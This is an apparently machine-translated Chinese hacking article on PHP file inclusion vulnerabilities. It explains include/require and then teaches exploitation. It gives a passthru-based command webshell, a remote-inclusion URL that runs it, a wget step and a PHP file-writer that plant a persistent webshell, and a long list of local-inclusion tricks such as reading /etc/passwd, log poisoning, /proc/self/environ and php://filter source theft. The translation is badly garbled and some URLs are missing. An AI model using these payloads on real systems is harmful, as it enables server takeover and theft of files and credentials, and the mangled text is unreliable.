PHP file include vulnerability details(including the truncated method)-vulnerability warning-the black bar safety net

ID MYHACK58:62201338337
Type myhack58
Reporter 佚名
Modified 2013-04-17T00:00:00


One, what is”remote file inclusion vulnerability”for?

The answer is: the server through the php properties of a function to contain any files, since you want to include this file source filter is not strict, so can go to that contains a malicious file and we can construct the malicious file to achieve evil purposes.

Relates to the hazard function: The include(),require()and the include_once(),require_once()

> Include:contains and run the specified file, when you include an external file when an error occurs, the system gives a warning, but the entire php file to continue execution. Require:with the include the only difference is, when the generated error when the include below to continue to run and the require to stop the run. The include_once:this function with the include function works almost the same, but he is in the import function before the first detection of whether the file is imported. If you have performed it again then it does not repeat. Require_once:this function with the require the difference to keep up with the surface I speak of include and the include_once is same. So I will not repeat.

php. ini configuration file: allow_url_fopen=off i.e., cannot contain a remote file. Php4 presence of the remote&local, php5 there is only local contains.

Second, why do you want to include file?

The programmer writes the program, don't like doing the same thing, also do not like to put the same code such as some utility functions to write a few times, so they need a common code written in a separate file inside, such as share.php and then in the other file contains the call. In php, we are using the above listed that several function to achieve this purpose, it is the workflow: if you want in main.php 里 包含 share.php I will write include(“share.php”)achieve the purpose, then you can use the share. in php a function, like this write the dead needs to contain the file name of the natural no problem, it will not appear vulnerability, then the problem is exactly where?

Sometimes may not be able to determine the need to which contains the file, such as the first point of view following the file index. php code:

> if ($_GET[page]) { include $_GET[page]; } else { include ”home.php”; }

A normal a section of PHP code, How does it work?

The above code use the format could be like this: 或者

Combined with the above code, The simple to say how the operation:

  1. Submit this URL in the index. php just made this page the value of$_GET[page] is.
  2. Judgment$_GET[page]is not empty, if not empty 这里 是 main.php just using include to include this file.
  3. If$_GET[page]is empty, then execute the else, to include ”home.php” this file.

Third, why have vulnerability?

You might say, so good yeah, you can follow the URL to dynamically include files, how convenient! how to produce a vulnerability? The answer is: we are not well-behaved, and we always liked and others do not, we will not follow his links to the operation, we may want to write their own want to include calls to a file, for example, we'll just hit the following URL: http: // /m4r10/php/index.php?page=hello.php the. Then our index. the php application just silly according to the above-we're steps to perform: take page 为 hello.php then go to the include(hello.php), then the question arises, because we did not hello. php this file so it include the time it will alarm to the report, similar to the following information:

> Warning: include(hello.php) [function. include]: failed to open stream: No such file or directory in /vhost/wwwroot/php/index.php on line 3 Warning: include() [function. include]: Failed opening ’hello.php’ for inclusion (include_path=’.:’) in /vhost/wwwroot/php/index.php on line 3

Note above that Warning is not found we specify the hello. php file, which is included within our Designated path of the file; and behind the warning is because the front did not find the specified file, so the included time is a warning.

Fourth, how to use?

Above you can see, the question arises, then, how do we take advantage of such vulnerability?, use of the method is actually a lot, but in essence are about the same, I said here three of the more common use of the method:

  1. Contains the read out of the target machine on the other file

From the foregoing we can see, due to the acquisition of the Parameters page there is no filtering, so we can specify any target on a host of other sensitive documents, such as previous warnings, we can see exposed the absolute path(vhost/wwwroot/php/), then we can repeatedly probe to include other files, such as specifying a URL: /m4r10/php/index. php? page=./ txt. txt can be read out of the current path of the txt. txt file, you can also use../../for the directory to jump in did not filter../the case; you can also directly specify an absolute path, read sensitive system files, such as this URL: /php/index. php? page=/etc/passwd, if the target host does not have the access restrictions very strictly, or start the Apache permissions is relatively high, can be read out of this file content. Otherwise you will get a similar to: open_basedir restriction in effect. The Warning here is due to the apache open_basedir to restrict access to directory.

  1. Remote file inclusion can be run the PHP Trojan

If the target host of the”allow_url_fopen”is activated, the default is active, not many people will modify, we can have greater use of space, we can specify other URL on the one that contains the PHP code of the webshell to run directly, for example, I first write a command to run the PHP code, 如下保存为cmd.txt(the suffix is not important, as long as the content is PHP format you can.

> if (get_magic_quotes_gpc()){ $_REQUEST["cmd"]=stripslashes($_REQUEST["cmd"]);} //remove escape characters can be removed in a string the backslash character ini_set(“max_execution_time”,0); //Set for this document the execution time, 0 for no limit. echo ”M4R10 start line”; //print the return of the start prompt information passthru($_REQUEST["cmd"]); //run the cmd the specified command echo ”M4R10 the end of the row”; //print return end prompt information ?& gt;

Above this file's role is to accept cmd specifies the command, and call the passthru function executes, the content is returned in M4R10 on the start line with M4R10 the end of the row. Save this file to our host server may be not supported in the PHP of the host, as long as through the HTTP access to can be, for example, at the following address:,then we can at that vulnerability on the host is configured as follows URL to use:

> /index. php? page=http://www. xxx. cn/cmd. txt? cmd=ls

Wherein the cmd back is what you need to perform the command, the other commonly used commands*UNIX for example as follows:

ll column Directory, a file equivalent to the Windows dir) pwd view the current absolute path id whoami view the current user wget to download the specified file URL

And so on the other, you host to go to BAIDU to find it, just not listed.

  1. Contain a create file PHP files commonly used)

Some people might think or get the goal machine on a real Webshell relatively assured, if which day home found here contains bug fixes, we can no longer remote included get above that” dummy”Webshell, isn't it? You can understand this mentality, we continue. Get a real Webshell, we also say that two kinds of common methods:

1)Use wget like command to download a Webshell

This is relatively simple, is also very commonly used, in the above we obtained that the pseudo-webshell, we can execute the command, then we can also call the system in a very powerful role, wget, the command of the powerful you can google the following, the parameters a bunch, absolutely engage in Halo you, Oh, we don't need so complicated, we use a-O–output - document=FILE, the document written to FILE file you can, huh.

The premise is that you follow the previous steps to put the one that contains the PHP code of the Webshell in a Can by HTTP or FTP, etc. can visit the place, than such as:,in this file write is Webshell. Then we get the pseudo-Webshell performed in the following URL: /cmd. txt? cmd=wget -O m4r10.php

If the current directory is writable, you can get one called m4r10. php Webshell, if the current directory is not writable, you also need to think about other approaches.

2 Use the file to create

In front of the wget may encounter the current directory cannot be written; or the target host is disabled or not installed this command, we need to work around itWe can combine the previous include file vulnerability to contain a create file, write file, PHP script, the content is as follows:

> <? php $f=file_get_contents(“”); //open the specified path in the file stream $ff=fopen(“./ upload/m4r10.php”,”a”); //look for a directory, create a file fwrite ($ff,$f); //put in front of an open file stream to write to the created file. fclose($ff); //close the Save File ?& gt;

Or write us to the above use wget to download the php file, but we have improved the method, using a PHP script to achieve, you can use the above cmd. php? cmd=ll find you can write to the directory, such as here in the upload, then the file is created in the directory:./ upload/m4r10.php the. And then we get our Webshell.

  1. The local file contains(common)

A typical exploit code:

> <? php include($_GET['pages'].‘. php’); ?& gt;

The Black Box determines the method: Purely from the URL determines the words in the URL path, dir, file, pag, page, archive, p, eng,language files, etc related keywords the eye, there may be a file containing the vulnerabilities.

Local contains exploits here first, ignore the truncation problem, the following will be the truncation method

1, included with the server to upload the jpg, txt, rar, etc file, this is the ideal situation.

2, contains the system's various logs, such as apache logs, file system logs, etc. in which the apache when the recording format is combined, The General log will be very large, the basic could not contain a success. Contains the log there is an automated attack program. Wherein the devils blog has mentioned a space issue. See The evil space-PHP local file inclusion vulnerability is the new breakthrough of To solve the space problem in fact the word base64 encryption and then the write can be performed.

3, contains /proc/self/environ . This environment variable has web Access session information and includes the user-agent parameter. the user-agent in client side can be modified. Reference: The Shell via LFI – proc/self/environ method of

4, included by the php program itself to generate files, cache, templates, etc., open source program success rate.

5, The use of local includes reading the PHP sensitive file, you need PHP5 and above versions. If you see a“config”in the source code as follows index. php? pages=php://filter/read=convert. base64-encode/resource=config Particularly the case with the readfile() function is not included in the implementation, can directly read the source code.

6, The use of the phpinfo page getshell it. Generally large organizations, the web group existence of phpinfo chance of getting bigger. poc and presentation of reference: The use of the phpinfo information LFI temporary files on

7, use contains an error, or contains an uninitialized variable in the PHP file, as long as the variable is not initialized it is possible to attack again specifically see: the include()local file inclusion vulnerability Caprice of 8, The combined cross-site use index.php?pages= xss=phpcode to consider a domain trust issues

9, containing temporary files file. This method is very troublesome. Reference: The POST method uploads for Resolve the temporary file deletion method: slow connection note: the premise is file_uploads = On 5.3. 1 increased max_file_uploadsphp. ini file_uploads = On 5.3. 1. increase the max_file_uploads, the default maximum uploaded 2 0. windows Format: win under the maximum of 4 random characters( 'a'-'z', 'A'-'Z', '0'-'9')such as: c:/windows/temp/php3e.tmp linux format: 6 random characters( 'a'-'z', 'A'-'Z', '0'-'9') such as:/tmp/phpUs7MxA Slow to connect the two to upload the code reference: The PHP security of the LFI vulnerability in GetShell method of the big parade of

1 0, The current it can't find the write permissions to the directory when injected into the log, then look for write permission to the directory. As injected into the log. Linux: index. php? pages=/var/log/apache/logs/error_log%0 0&x=/&y=uname windows: index. php? pages=..\apache\logs\error. log%0 0&x=.& amp;y=dir With specific reference to the PHP local file inclusion(LFI)vulnerability use of

1 1, Using the php wrapper for example, php://input, php://filter, data://, etc. include file in the PHP 5.2.0 and allow_url_include on// which mentioned the allow_url_fopen and allow_url_include only protect against URL the handles labeled URL. This affects the http(s) and ftp(s)but did not affect the php or the date of these url forms. 1 2, the LFI determines whether the directory exists and the column directory, such as index. php? pages=../../../../../../var/www/dossierexistant/../../../../../etc/passwd%0 0 This method in TTYshell can be completely can be determined, but on the URL sometimes is not feasible. Even if there is no dossierexistant can also echo the passwd content. index. php? pages=../../../../../../var/www/dossierexistant/../../../../../etc/passwd%0 0 FreeBSD the directory listing with PHP file functions under ... php-file-functions/ listed directory There is a logical judgment, 如不存在该目录就会返回header.php+File not found+footer.php 存在 就 会 返回 header.php+footer.php the. This logic is consistent with the programmer's habits. Once used to find a directory deep in the log to get the shell.

1 to 3, comprising a SESSION file, php the Save format sess_SESSIONID the default location is/tmp/(PHP Sessions),/var/lib/php/session/(PHP Sessions), /var/lib/php5/(PHP Sessions) and the c:/windows/temp/(PHP Sessions), etc. file.

1 4, contains /proc/self/cmdline or/proc/self/fd/to find the log file owner is root, the default root to access Specific reference: Local File Inclusion – The Tricks of the Trade of There are other mentioned contains the/var/log/auth. log, but this file by default is 6 4 4.

1 to 5, comprising maillog usual location/var/log/maillog this method is also very tasteless, with particular reference to: the local file inclusion tricks of Link can't find it.

1 to 6, comprising a fixed file, very tasteless, in order to integrity is also provided. Such as, the available middle attack.

[1] [2] [3] next